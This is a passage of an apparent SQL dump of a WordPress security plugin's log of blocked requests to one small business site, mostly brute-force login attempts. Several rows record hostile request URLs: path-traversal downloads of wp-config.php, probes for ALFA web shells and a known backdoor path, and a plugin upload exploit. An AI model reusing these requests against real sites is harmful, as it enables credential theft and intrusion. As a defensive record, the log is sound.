11:16:04','46.161.11.8','http://smithandsmith.co.za/contact/','httpbl',''),(5202,'2022-01-27 11:16:05','46.161.11.8','http://smithandsmith.co.za/','httpbl',''),(5203,'2022-01-27 11:16:05','46.161.11.8','http://smithandsmith.co.za/','httpbl',''),(5204,'2022-01-27 12:55:50','163.123.142.249','https://smithandsmith.co.za/wp-content/plugins/angwp/__%20UPDATES.txt','404shield',''),(5205,'2022-01-27 12:55:51','163.123.142.249','https://smithandsmith.co.za/wp-content/plugins/iwp-client/readme.txt','404shield',''),(5206,'2022-01-27 12:55:51','163.123.142.249','https://smithandsmith.co.za/wp-content/plugins/advanced-import/readme.txt','404shield',''),(5207,'2022-01-27 12:55:51','163.123.142.249','https://smithandsmith.co.za/wp-content/plugins/themegrill-demo-importer/readme.txt','404shield',''),(5208,'2022-01-27 12:55:51','163.123.142.249','https://smithandsmith.co.za/wp-content/plugins/woocommerce-jetpack/readme.txt','404shield',''),(5209,'2022-01-27 15:47:54','164.68.99.251','https://smithandsmith.co.za/wp-login.php','404shield',''),(5210,'2022-01-27 22:27:22','51.140.68.179','https://smithandsmith.co.za/wp-content/plugins/superstorefinder-wp/ssf-wp-admin/pages/import.php','404shield',''),(5211,'2022-01-27 22:27:23','51.140.68.179','https://smithandsmith.co.za/wp-content/plugins/superlogoshowcase-wp/sls-wp-admin/pages/import.php','404shield',''),(5212,'2022-01-27 22:27:24','51.140.68.179','https://smithandsmith.co.za/wp-content/plugins/super-interactive-maps/sim-wp-admin/pages/import.php','404shield',''),(5213,'2022-01-28 09:44:38','154.38.101.80','https://smithandsmith.co.za/wp-content/plugins/vc-tabs/assets/backend/custom/admin-notice.js','404shield',''),(5214,'2022-01-28 17:05:23','109.194.141.174','https://smithandsmith.co.za/wp-login.php','404shield',''),(5215,'2022-01-29 19:09:29','5.188.62.140','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5216,'2022-01-31 14:34:09','173.201.176.23','https://smithandsmith.co.za/wp-login.php','404shield',''),(5217,'2022-01-31 16:47:47','81.88.52.134','https://www.smithandsmith.co.za/wp-login.php','404shield',''),(5218,'2022-02-01 11:08:26','104.209.32.73','http://smithandsmith.co.za//administrator/index.php','adminpw',''),(5219,'2022-02-01 12:52:52','51.91.7.5','http://smithandsmith.co.za/blog/wp-admin/admin.php?page=miwoftp&option=com_miwoftp&action=download&dir=/&item=wp-config.php&order=name&srt=yes','dfishield',''),(5220,'2022-02-01 12:53:07','51.91.7.5','http://smithandsmith.co.za/blog/wp-content/plugins/wp-filemanager/incl/libfile.php?&path=../../&filename=wp-config.php&action=download','dfishield',''),(5221,'2022-02-02 02:37:18','62.197.136.102','https://www.smithandsmith.co.za/wp-content/uploads/ALFA_DATA/alfacgiapi/perl.alfa','404shield',''),(5222,'2022-02-02 02:37:43','62.197.136.102','https://www.smithandsmith.co.za/wp-content/uploads/ALFA_DATA/alfacgiapi/bash.alfa','404shield',''),(5223,'2022-02-02 02:38:02','62.197.136.102','https://www.smithandsmith.co.za/wp-content/uploads/ALFA_DATA/alfacgiapi/py.alfa','404shield',''),(5224,'2022-02-02 04:46:50','5.188.62.140','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5225,'2022-02-02 05:55:45','104.45.41.45','https://smithandsmith.co.za/wp-login.php','404shield',''),(5226,'2022-02-02 07:17:06','20.119.183.39','https://smithandsmith.co.za/wp-admin/css/','404shield',''),(5227,'2022-02-02 07:19:02','20.119.183.39','https://www.smithandsmith.co.za/wp-admin/css/','404shield',''),(5228,'2022-02-02 16:52:27','15.228.221.205','https://smithandsmith.co.za/wp-login.php','404shield',''),(5229,'2022-02-02 16:52:28','15.228.221.205','https://smithandsmith.co.za/wp-login.php','404shield',''),(5230,'2022-02-02 16:52:28','15.228.221.205','https://smithandsmith.co.za/wp-login.php','404shield',''),(5231,'2022-02-03 07:02:14','109.234.161.67','https://www.smithandsmith.co.za/wp-login.php','404shield',''),(5232,'2022-02-03 18:52:11','65.108.101.14','https://smithandsmith.co.za/wp-admin/css/','404shield',''),(5233,'2022-02-03 22:41:24','5.188.62.140','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5234,'2022-02-04 15:41:43','212.193.30.122','https://smithandsmith.co.za/wp-content/plugins/dzs-zoomsounds/savepng.php?location=FoxTest.php','404shield',''),(5235,'2022-02-05 08:05:50','91.199.149.239','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5236,'2022-02-05 08:05:52','91.199.149.239','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5237,'2022-02-05 08:05:53','91.199.149.239','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5238,'2022-02-05 13:16:01','40.121.16.186','https://smithandsmith.co.za/wp-admin/css/','404shield',''),(5239,'2022-02-05 13:17:07','40.121.16.186','https://www.smithandsmith.co.za/wp-admin/css/','404shield',''),(5240,'2022-02-05 15:41:44','91.199.149.239','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5241,'2022-02-05 15:41:46','91.199.149.239','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5242,'2022-02-05 15:41:48','91.199.149.239','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5243,'2022-02-05 23:20:26','91.199.149.239','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5244,'2022-02-05 23:20:27','91.199.149.239','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5245,'2022-02-05 23:20:30','91.199.149.239','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5246,'2022-02-06 11:33:26','46.161.11.8','http://smithandsmith.co.za/contact/','httpbl',''),(5247,'2022-02-06 11:33:26','46.161.11.8','http://smithandsmith.co.za/','httpbl',''),(5248,'2022-02-06 11:33:29','46.161.11.8','http://smithandsmith.co.za/','httpbl',''),(5249,'2022-02-06 13:42:37','212.193.30.122','https://smithandsmith.co.za/wp-content/plugins/wpdiscuz/themes/default/style.css','404shield',''),(5250,'2022-02-06 20:21:38','209.145.52.234','https://smithandsmith.co.za/wp-login.php','404shield',''),(5251,'2022-02-06 22:56:31','5.188.62.140','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5252,'2022-02-07 13:11:52','185.119.81.109','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5253,'2022-02-07 13:20:44','185.119.81.109','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5254,'2022-02-08 01:52:08','51.195.45.190','https://smithandsmith.co.za/contact/','httpbl',''),(5255,'2022-02-08 01:52:09','51.195.45.190','https://smithandsmith.co.za/','httpbl',''),(5256,'2022-02-08 01:52:10','51.195.45.190','https://smithandsmith.co.za/','httpbl',''),(5257,'2022-02-08 01:57:19','18.188.109.168','https://smithandsmith.co.za/wp-login.php','404shield',''),(5258,'2022-02-08 01:57:19','18.188.109.168','https://smithandsmith.co.za/wp-login.php','404shield',''),(5259,'2022-02-08 01:57:19','18.188.109.168','https://smithandsmith.co.za/wp-login.php','404shield',''),(5260,'2022-02-08 03:15:12','95.111.250.205','https://www.smithandsmith.co.za/wp-login.php','404shield',''),(5261,'2022-02-08 08:30:43','185.88.177.231','https://smithandsmith.co.za/wp-login.php','404shield',''),(5262,'2022-02-08 18:31:38','132.148.224.56','https://www.smithandsmith.co.za/wp-login.php','404shield',''),(5263,'2022-02-08 21:57:46','62.197.136.223','https://smithandsmith.co.za/wp-admin/style.php','404shield',''),(5264,'2022-02-08 21:58:18','62.197.136.223','https://smithandsmith.co.za/wp-content/mu-plugins-old/index.php?f=/NmRtJOUjAdutReQj/scRjKUhleBpzmTyO.txt','404shield',''),(5265,'2022-02-08 21:58:55','62.197.136.223','https://smithandsmith.co.za/wp-admin.php?daksldlkdsadas=1','404shield',''),(5266,'2022-02-08 22:49:43','5.188.62.140','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5267,'2022-02-09 19:23:59','128.199.197.163','https://smithandsmith.co.za/wp-login.php','404shield',''),(5268,'2022-02-09 22:21:29','47.109.40.23','http://smithandsmith.co.za/contact/','httpbl',''),(5269,'2022-02-09 22:21:31','47.109.40.23','http://smithandsmith.co.za/','httpbl',''),(5270,'2022-02-09 23:33:35','185.220.100.252','https://smithandsmith.co.za/xmlrpc.php','httpbl',''),(5271,'2022-02-09 23:33:36','185.220.100.252','https://smithandsmith.co.za/xmlrpc.php','httpbl',''),(5272,'2022-02-09 23:33:37','185.220.100.252','https://smithandsmith.co.za/xmlrpc.php','httpbl',''),(5273,'2022-02-10 16:50:08','45.125.239.234','https://smithandsmith.co.za/wp-login.php','404shield',''),(5274,'2022-02-11 15:04:31','47.109.40.23','http://smithandsmith.co.za/contact/','httpbl',''),(5275,'2022-02-11 15:04:36','47.109.40.23','http://smithandsmith.co.za/','httpbl',''),(5276,'2022-02-11 15:05:10','47.109.40.23','http://smithandsmith.co.za/','httpbl',''),(5277,'2022-02-11 15:05:24','200.105.179.250','http://smithandsmith.co.za/contact/','httpbl',''),(5278,'2022-02-11 15:05:26','200.105.179.250','http://smithandsmith.co.za/','httpbl',''),(5279,'2022-02-11 16:00:38','125.227.127.195','https://smithandsmith.co.za/wp-login.php','404shield',''),(5280,'2022-02-12 06:15:05','171.25.193.78','http://smithandsmith.co.za/contact/','httpbl',''),(5281,'2022-02-12 06:15:06','171.25.193.78','http://smithandsmith.co.za/','httpbl',''),(5282,'2022-02-12 20:37:38','109.234.161.67','https://smithandsmith.co.za/wp-login.php','404shield',''),(5283,'2022-02-12 23:15:40','5.188.62.140','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5284,'2022-02-12 23:40:53','18.140.97.29','https://smithandsmith.co.za/wp-login.php','404shield',''),(5285,'2022-02-12 23:40:53','18.140.97.29','https://smithandsmith.co.za/wp-login.php','404shield',''),(5286,'2022-02-12 23:40:53','18.140.97.29','https://smithandsmith.co.za/wp-login.php','404shield',''),(5287,'2022-02-13 00:33:14','14.29.237.242','https://www.smithandsmith.co.za/wp-login.php','404shield',''),(5288,'2022-02-13 10:16:40','194.32.107.161','https://smithandsmith.co.za/xmlrpc.php','httpbl',''),(5289,'2022-02-13 10:16:42','194.32.107.161','https://smithandsmith.co.za/xmlrpc.php','httpbl',''),(5290,'2022-02-13 10:16:43','194.32.107.161','https://smithandsmith.co.za/xmlrpc.php','httpbl',''),(5291,'2022-02-13 23:04:03','5.188.62.140','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5292,'2022-02-14 22:52:36','176.53.65.237','https://smithandsmith.co.za/wp-login.php','404shield',''),(5293,'2022-02-15 04:29:58','77.83.175.238','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5294,'2022-02-15 04:30:02','77.83.175.238','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5295,'2022-02-15 04:30:07','77.83.175.238','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5296,'2022-02-15 14:09:00','184.168.98.0','https://smithandsmith.co.za/wp-login.php','404shield',''),(5297,'2022-02-15 20:36:26','217.79.179.7','https://smithandsmith.co.za/wp-login.php','404shield',''),(5298,'2022-02-15 20:36:27','217.79.179.7','https://smithandsmith.co.za/wp-login.php','404shield',''),(5299,'2022-02-15 20:36:28','217.79.179.7','https://smithandsmith.co.za/wp-login.php','404shield',''),(5300,'2022-02-15 22:01:23','89.58.27.84','https://smithandsmith.co.za/wp-login.php','404shield',''),(5301,'2022-02-15 22:01:25','89.58.27.84','https://smithandsmith.co.za/wp-login.php','404shield',''),(5302,'2022-02-15 22:01:28','89.58.27.84','https://smithandsmith.co.za/wp-login.php','404shield',''),(5303,'2022-02-15 23:04:16','5.188.62.140','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5304,'2022-02-17 15:47:56','167.86.105.202','https://smithandsmith.co.za/wp-login.php','404shield',''),(5305,'2022-02-17 23:20:19','5.188.62.140','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5306,'2022-02-18 04:19:24','148.66.147.32','https://smithandsmith.co.za/wp-content/mu-plugins-old/index.php?f=/NmRtJOUjAdutReQj/scRjKUhleBpzmTyO.txt','404shield',''),(5307,'2022-02-18 07:38:00','185.191.34.215','https://smithandsmith.co.za/wp-content/plugins/background-image-cropper/accesson.php','404shield',''),(5308,'2022-02-18 16:31:11','104.244.72.7','https://smithandsmith.co.za/wp-login.php','404shield',''),(5309,'2022-02-18 16:31:14','104.244.72.7','https://smithandsmith.co.za/wp-login.php','404shield',''),(5310,'2022-02-18 16:31:15','104.244.72.7','https://smithandsmith.co.za/wp-login.php','404shield',''),(5311,'2022-02-18 19:38:08','185.67.82.114','https://smithandsmith.co.za/wp-login.php','404shield',''),(5312,'2022-02-18 19:38:10','185.67.82.114','https://smithandsmith.co.za/wp-login.php','404shield',''),(5313,'2022-02-18 19:38:10','185.67.82.114','https://smithandsmith.co.za/wp-login.php','404shield',''),(5314,'2022-02-19 01:20:28','92.205.56.212','https://smithandsmith.co.za/wp-admin/css/','404shield',''),(5315,'2022-02-19 23:27:03','5.188.62.140','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5316,'2022-02-20 06:49:13','162.214.190.255','https://smithandsmith.co.za/wp-login.php','404shield',''),(5317,'2022-02-20 10:29:22','23.100.41.199','https://smithandsmith.co.za//wp-admin/install.php?step=1','404shield',''),(5318,'2022-02-20 10:29:28','23.100.41.199','https://smithandsmith.co.za//wp-admin/setup-config.php','404shield',''),(5319,'2022-02-20 21:38:27','185.128.26.216','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5320,'2022-02-20 21:38:31','185.128.26.216','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5321,'2022-02-20 21:38:33','185.128.26.216','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5322,'2022-02-20 22:52:36','162.12.206.9','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5323,'2022-02-20 22:52:40','162.12.206.9','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5324,'2022-02-20 22:52:44','162.12.206.9','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5325,'2022-02-20 23:15:34','5.188.62.140','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5326,'2022-02-21 01:22:32','185.191.34.215','https://smithandsmith.co.za/wp-content/plugins/background-image-cropper/image/ico/accesson.php','404shield',''),(5327,'2022-02-21 11:38:30','156.238.183.133','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5328,'2022-02-21 11:38:34','156.238.183.133','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5329,'2022-02-21 11:38:38','156.238.183.133','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5330,'2022-02-21 16:25:41','89.46.109.154','https://smithandsmith.co.za/wp-login.php','404shield',''),(5331,'2022-02-21 20:23:43','185.128.26.216','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5332,'2022-02-21 20:23:45','185.128.26.216','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5333,'2022-02-21 20:23:47','185.128.26.216','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5334,'2022-02-21 21:05:26','156.238.183.133','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5335,'2022-02-21 21:05:32','156.238.183.133','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5336,'2022-02-21 21:05:35','156.238.183.133','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5337,'2022-02-21 21:41:33','162.12.206.9','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5338,'2022-02-21 21:41:38','162.12.206.9','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5339,'2022-02-21 21:41:42','162.12.206.9','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5340,'2022-02-21 23:02:07','185.100.87.202','http://smithandsmith.co.za/contact/','httpbl',''),(5341,'2022-02-21 23:02:37','23.154.177.7','http://smithandsmith.co.za/','httpbl',''),(5342,'2022-02-22 00:32:44','109.70.100.79','http://smithandsmith.co.za/wp-login.php','httpbl',''),(5343,'2022-02-22 00:32:45','109.70.100.79','http://smithandsmith.co.za/wp-login.php','httpbl',''),(5344,'2022-02-22 00:32:47','109.70.100.79','http://smithandsmith.co.za/wp-login.php','httpbl',''),(5345,'2022-02-22 02:53:23','212.192.241.18','https://www.smithandsmith.co.za/wp-admin/style.php','404shield',''),(5346,'2022-02-22 02:55:12','212.192.241.18','https://www.smithandsmith.co.za/wp-content/mu-plugins-old/index.php?f=/NmRtJOUjAdutReQj/scRjKUhleBpzmTyO.txt','404shield',''),(5347,'2022-02-22 02:59:02','212.192.241.18','https://www.smithandsmith.co.za/wp-admin.php?daksldlkdsadas=1','404shield',''),(5348,'2022-02-22 04:35:19','65.108.217.252','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5349,'2022-02-22 04:35:22','65.108.217.252','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5350,'2022-02-22 04:35:23','65.108.217.252','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5351,'2022-02-22 11:32:21','45.56.70.111','https://smithandsmith.co.za/wp-login.php','404shield',''),(5352,'2022-02-22 11:32:24','45.56.70.111','https://smithandsmith.co.za/wp-login.php','404shield',''),(5353,'2022-02-22 11:32:25','45.56.70.111','https://smithandsmith.co.za/wp-login.php','404shield',''),(5354,'2022-02-22 16:05:48','185.128.26.216','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5355,'2022-02-22 16:05:50','185.128.26.216','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5356,'2022-02-22 16:05:52','185.128.26.216','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5357,'2022-02-22 18:04:50','104.199.7.30','https://smithandsmith.co.za/wp-login.php','404shield',''),(5358,'2022-02-22 18:24:55','65.108.217.252','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5359,'2022-02-22 18:24:57','65.108.217.252','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5360,'2022-02-22 18:24:58','65.108.217.252','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5361,'2022-02-22 18:26:27','162.12.206.9','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5362,'2022-02-22 18:26:30','162.12.206.9','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5363,'2022-02-22 18:26:35','162.12.206.9','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5364,'2022-02-22 23:15:26','5.188.62.140','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5365,'2022-02-23 00:02:03','185.14.97.145','http://smithandsmith.co.za/contact/','httpbl',''),(5366,'2022-02-23 00:02:04','185.14.97.145','http://smithandsmith.co.za/','httpbl',''),(5367,'2022-02-23 08:26:51','156.238.183.133','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5368,'2022-02-23 08:26:56','156.238.183.133','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5369,'2022-02-23 08:26:59','156.238.183.133','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5370,'2022-02-23 08:42:04','65.108.217.252','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5371,'2022-02-23 08:42:05','65.108.217.252','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5372,'2022-02-23 08:42:06','65.108.217.252','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5373,'2022-02-23 16:00:41','107.189.2.91','https://smithandsmith.co.za/wp-login.php','404shield',''),(5374,'2022-02-23 16:00:43','107.189.2.91','https://smithandsmith.co.za/wp-login.php','404shield',''),(5375,'2022-02-23 16:00:44','107.189.2.91','https://smithandsmith.co.za/wp-login.php','404shield',''),(5376,'2022-02-23 16:10:43','20.108.9.69','https://smithandsmith.co.za/wp-admin/includes/class-wp-media-list-data.php','404shield',''),(5377,'2022-02-23 16:15:50','20.108.9.69','https://smithandsmith.co.za/wp-admin.php','404shield',''),(5378,'2022-02-23 16:40:50','5.183.209.217','https://smithandsmith.co.za/wp-login.php','404shield',''),(5379,'2022-02-23 16:40:52','5.183.209.217','https://smithandsmith.co.za/wp-login.php','404shield',''),(5380,'2022-02-23 16:40:52','5.183.209.217','https://smithandsmith.co.za/wp-login.php','404shield',''),(5381,'2022-02-23 16:40:58','185.220.102.243','https://smithandsmith.co.za/wp-login.php','404shield',''),(5382,'2022-02-24 07:12:18','64.227.53.63','https://smithandsmith.co.za/wp-login.php','404shield',''),(5383,'2022-02-24 14:00:52','185.220.102.243','https://smithandsmith.co.za/wp-login.php','404shield',''),(5384,'2022-02-24 14:00:54','185.220.102.243','https://smithandsmith.co.za/wp-login.php','404shield',''),(5385,'2022-02-24 14:00:56','185.220.102.243','https://smithandsmith.co.za/wp-login.php','404shield',''),(5386,'2022-02-24 14:01:01','185.220.100.254','http://smithandsmith.co.za/wp-login.php','httpbl',''),(5387,'2022-02-24 14:01:03','185.220.100.254','http://smithandsmith.co.za/wp-login.php','httpbl',''),(5388,'2022-02-24 14:30:56','178.17.174.14','http://smithandsmith.co.za/wp-login.php','httpbl',''),(5389,'2022-02-24 14:30:57','178.17.174.14','http://smithandsmith.co.za/wp-login.php','httpbl',''),(5390,'2022-02-24 14:30:58','178.17.174.14','http://smithandsmith.co.za/wp-login.php','httpbl',''),(5391,'2022-02-24 17:32:43','178.128.208.170','https://smithandsmith.co.za/wp-login.php','404shield',''),(5392,'2022-02-24 23:44:54','5.188.62.140','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5393,'2022-02-25 10:37:28','185.220.101.159','https://smithandsmith.co.za/wp-login.php','404shield',''),(5394,'2022-02-25 10:37:30','185.220.101.159','https://smithandsmith.co.za/wp-login.php','404shield',''),(5395,'2022-02-25 10:37:30','185.220.101.159','https://smithandsmith.co.za/wp-login.php','404shield',''),(5396,'2022-02-25 11:07:12','185.220.100.248','https://smithandsmith.co.za/wp-login.php','404shield',''),(5397,'2022-02-25 11:07:15','185.220.100.248','https://smithandsmith.co.za/wp-login.php','404shield',''),(5398,'2022-02-25 11:07:16','185.220.100.248','https://smithandsmith.co.za/wp-login.php','404shield',''),(5399,'2022-02-25 18:54:09','196.244.192.231','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5400,'2022-02-25 18:54:10','196.244.192.231','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5401,'2022-02-25 18:54:11','196.244.192.231','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5402,'2022-02-26 08:13:02','193.218.118.145','https://smithandsmith.co.za/wp-login.php','404shield',''),(5403,'2022-02-26 08:13:05','193.218.118.145','https://smithandsmith.co.za/wp-login.php','404shield',''),(5404,'2022-02-26 08:13:06','193.218.118.145','https://smithandsmith.co.za/wp-login.php','404shield',''),(5405,'2022-02-26 08:13:12','107.189.14.182','https://smithandsmith.co.za/wp-login.php','404shield',''),(5406,'2022-02-26 08:45:38','185.14.97.145','http://smithandsmith.co.za/wp-login.php','httpbl',''),(5407,'2022-02-26 08:45:39','185.14.97.145','http://smithandsmith.co.za/wp-login.php','httpbl',''),(5408,'2022-02-26 08:45:41','185.14.97.145','http://smithandsmith.co.za/wp-login.php','httpbl',''),(5409,'2022-02-26 10:40:37','82.146.33.54','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5410,'2022-02-26 18:26:47','72.167.58.121','https://smithandsmith.co.za/wp-login.php','404shield',''),(5411,'2022-02-27 00:12:56','5.188.62.140','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5412,'2022-02-27 04:32:50','109.70.100.30','https://smithandsmith.co.za/wp-login.php','404shield',''),(5413,'2022-02-27 04:32:52','109.70.100.30','https://smithandsmith.co.za/wp-login.php','404shield',''),(5414,'2022-02-27 04:32:52','109.70.100.30','https://smithandsmith.co.za/wp-login.php','404shield',''),(5415,'2022-02-27 05:01:23','109.70.100.23','http://smithandsmith.co.za/wp-login.php','httpbl',''),(5416,'2022-02-27 05:01:25','109.70.100.23','http://smithandsmith.co.za/wp-login.php','httpbl',''),(5417,'2022-02-27 05:01:25','109.70.100.23','http://smithandsmith.co.za/wp-login.php','httpbl',''),(5418,'2022-02-27 09:29:17','196.244.192.231','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5419,'2022-02-27 09:29:19','196.244.192.231','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5420,'2022-02-27 09:29:20','196.244.192.231','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5421,'2022-02-27 09:39:34','84.247.59.172','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5422,'2022-02-27 09:39:36','84.247.59.172','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5423,'2022-02-27 09:39:38','84.247.59.172','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5424,'2022-02-27 23:54:55','5.188.62.140','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5425,'2022-02-28 02:09:07','109.70.100.82','https://smithandsmith.co.za/wp-login.php','404shield',''),(5426,'2022-02-28 02:09:08','109.70.100.82','https://smithandsmith.co.za/wp-login.php','404shield',''),(5427,'2022-02-28 02:09:10','109.70.100.82','https://smithandsmith.co.za/wp-login.php','404shield',''),(5428,'2022-02-28 02:41:23','185.220.102.7','https://smithandsmith.co.za/wp-login.php','404shield',''),(5429,'2022-02-28 02:41:25','185.220.102.7','https://smithandsmith.co.za/wp-login.php','404shield',''),(5430,'2022-02-28 02:41:26','185.220.102.7','https://smithandsmith.co.za/wp-login.php','404shield',''),(5431,'2022-02-28 07:51:28','196.244.192.231','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5432,'2022-02-28 07:51:30','196.244.192.231','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5433,'2022-02-28 07:51:31','196.244.192.231','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5434,'2022-02-28 08:36:18','45.144.227.11','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5435,'2022-02-28 08:36:22','45.144.227.11','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5436,'2022-02-28 08:36:27','45.144.227.11','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5437,'2022-02-28 12:28:24','103.159.224.46','https://smithandsmith.co.za/wp-login.php','404shield',''),(5438,'2022-02-28 22:48:10','84.247.59.177','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5439,'2022-02-28 22:48:12','84.247.59.177','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5440,'2022-02-28 22:48:13','84.247.59.177','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5441,'2022-02-28 23:09:22','109.70.100.26','https://smithandsmith.co.za/wp-login.php','404shield',''),(5442,'2022-02-28 23:09:24','109.70.100.26','https://smithandsmith.co.za/wp-login.php','404shield',''),(5443,'2022-02-28 23:09:25','109.70.100.26','https://smithandsmith.co.za/wp-login.php','404shield',''),(5444,'2022-02-28 23:09:27','185.35.202.222','http://smithandsmith.co.za/wp-login.php','httpbl',''),(5445,'2022-02-28 23:09:29','185.35.202.222','http://smithandsmith.co.za/wp-login.php','httpbl',''),(5446,'2022-03-01 01:15:35','185.220.101.141','https://smithandsmith.co.za/wp-login.php','404shield',''),(5447,'2022-03-01 01:15:39','185.220.101.141','https://smithandsmith.co.za/wp-login.php','404shield',''),(5448,'2022-03-01 01:15:39','185.220.101.141','https://smithandsmith.co.za/wp-login.php','404shield',''),(5449,'2022-03-01 18:33:09','92.205.1.246','https://smithandsmith.co.za/wp-login.php','404shield',''),(5450,'2022-03-01 18:53:13','45.144.227.11','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5451,'2022-03-01 18:53:18','45.144.227.11','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5452,'2022-03-01 18:53:22','45.144.227.11','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5453,'2022-03-01 20:12:37','185.220.101.144','https://smithandsmith.co.za/wp-login.php','404shield',''),(5454,'2022-03-01 20:12:39','185.220.101.144','https://smithandsmith.co.za/wp-login.php','404shield',''),(5455,'2022-03-01 20:12:40','185.220.101.144','https://smithandsmith.co.za/wp-login.php','404shield',''),(5456,'2022-03-01 20:12:46','46.101.150.59','https://smithandsmith.co.za/wp-login.php','404shield',''),(5457,'2022-03-01 20:42:53','199.249.230.157','https://smithandsmith.co.za/wp-login.php','404shield',''),(5458,'2022-03-01 20:42:58','199.249.230.157','https://smithandsmith.co.za/wp-login.php','404shield',''),(5459,'2022-03-01 20:43:00','199.249.230.157','https://smithandsmith.co.za/wp-login.php','404shield',''),(5460,'2022-03-02 00:43:47','5.188.62.140','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5461,'2022-03-02 09:24:02','84.247.59.151','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5462,'2022-03-02 09:24:04','84.247.59.151','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5463,'2022-03-02 09:24:05','84.247.59.151','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5464,'2022-03-02 12:38:35','115.159.82.216','https://www.smithandsmith.co.za/wp-login.php','404shield',''),(5465,'2022-03-02 15:51:03','109.70.100.32','https://smithandsmith.co.za/wp-login.php','404shield',''),(5466,'2022-03-02 15:51:05','109.70.100.32','https://smithandsmith.co.za/wp-login.php','404shield',''),(5467,'2022-03-02 15:51:06','109.70.100.32','https://smithandsmith.co.za/wp-login.php','404shield',''),(5468,'2022-03-02 16:20:08','185.220.101.154','https://smithandsmith.co.za/wp-login.php','404shield',''),(5469,'2022-03-02 16:20:10','185.220.101.154','https://smithandsmith.co.za/wp-login.php','404shield',''),(5470,'2022-03-02 16:20:11','185.220.101.154','https://smithandsmith.co.za/wp-login.php','404shield',''),(5471,'2022-03-02 17:09:42','103.129.178.69','https://www.smithandsmith.co.za/wp-login.php','404shield',''),(5472,'2022-03-02 21:17:00','185.159.156.20','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5473,'2022-03-02 